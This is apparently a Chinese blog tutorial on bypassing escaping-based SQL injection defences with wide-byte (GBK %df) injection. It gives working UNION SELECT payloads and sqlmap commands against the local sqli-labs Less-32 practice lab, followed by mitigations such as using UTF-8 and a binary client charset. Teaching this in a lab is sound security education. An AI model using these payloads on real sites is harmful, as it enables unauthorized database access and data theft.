首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >1.4.1-SQL注入防御绕过-宽字节注入

1.4.1-SQL注入防御绕过-宽字节注入

作者头像
tea9
发布2022-07-16 16:43:08
发布2022-07-16 16:43:08
1.2K00
代码可运行
举报
文章被收录于专栏:tea9的博客tea9的博客
运行总次数:0
代码可运行

01 宽字节注入原理

什么是宽字节 GB2312、GBK、GB8030、BIG5、Shift_JIS等这些都是常说的宽字节,实际为两字节。

站点可能为了防止SQL注入,会加\转义’,最后变成'

MySQL在使用GBK编码的时候,会认为两个字符为一个汉字。 使用%df’进行编码,两个字符组合,认为是一个汉字。 注:前一个Ascii码大于128才能到汉字的范围

02 宽字节注入方法

代码语言:javascript
代码运行次数:0
运行
复制
http://127.0.0.1/sqli-labs/Less-32/?id=%df' union select 1,(select user()),3--+
代码语言:javascript
代码运行次数:0
运行
复制
http://127.0.0.1/sqli-labs/Less-32/?id=%df' union select 1,(select table_name from information_schema.tables where table_schema=database() limit 0,1),3--+ // 查表

sqlmap:
sqlmap -u "http://127.0.0.1/Less-32/?id=1" // 判断id不是注入点 因为被转义

sqlmap -u "http://127.0.0.1/Less-32/?id=1%df" // 通过宽字节注入

宽字节注入应对策略:

  • 使用utf-8,避免宽字节注入; ps:不仅在gbk,韩文、日文等等都是宽字节,都有可能存在宽字节注入漏洞。
  • mysql_real_escape_string,mysql_set_charset(‘gbk’,$conn) // 替换 和 编码 两个函数一起使用
  • 可以设置参数,charcater_set_client=binary // 设置mysql的连接参数,使用二进制模式
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 01 宽字节注入原理
  • 02 宽字节注入方法
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档